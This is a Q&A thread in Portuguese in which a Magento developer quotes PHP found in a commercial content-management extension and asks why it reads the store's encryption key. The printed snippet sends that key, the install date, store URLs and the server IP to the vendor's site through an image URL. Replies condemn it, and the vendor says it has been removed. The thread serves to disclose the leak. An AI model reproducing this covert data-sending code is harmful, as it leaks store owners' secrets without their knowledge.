Perdoe minha ignorância, mas a chave de criptografia é usada para descriptografar dados do Magento, certo? Existe alguma boa razão para um módulo acessar isso? Eu me deparei com esse código depois de instalar o Advanced Content Manager ...
<div id="banana-tracker">
<?php
$stores = Mage::app()->getStores();
$key = (string)Mage::getConfig()->getNode('global/crypt/key');
$date = (string)Mage::getConfig()->getNode('global/install/date');
$serverIp = $_SERVER['SERVER_ADDR'];
$params = 'key='.$key.'&date='.$date.'&';
foreach($stores as $store)
{
$params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
}
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />
magento-1.9
TylersSN
fonte
fonte
Respostas:
Sim ... há uma boa razão.
Eles querem conhecê-lo e registrá-lo, apenas por precaução. :)
Você deve desinstalar a extensão (provavelmente já o fez). Você nunca deve usar extensões que "telefonam para casa", independentemente dos dados que eles enviam para casa.
Você pode listar a extensão aqui para outras pessoas verem: Código engraçado / inútil / horrível de Magento Extensions
fonte
Recebemos a solicitação de suporte sobre esse recurso hoje. Já o resolvemos e removemos esse trecho de código. Uma nova versão está disponível para todos os nossos clientes em sua área de clientes (gratuitamente, pois oferecemos atualização ilimitada).
Eu sei que precisamos justificar isso, então vamos fazer isso:
Reconhecemos que é um erro, e essa é a força da comunidade e do sistema de código aberto: podemos corrigir e melhorar muito mais rapidamente. Obrigado a todos por terem nos alertado, faremos mais esforços na vulnerabilidade agora.
fonte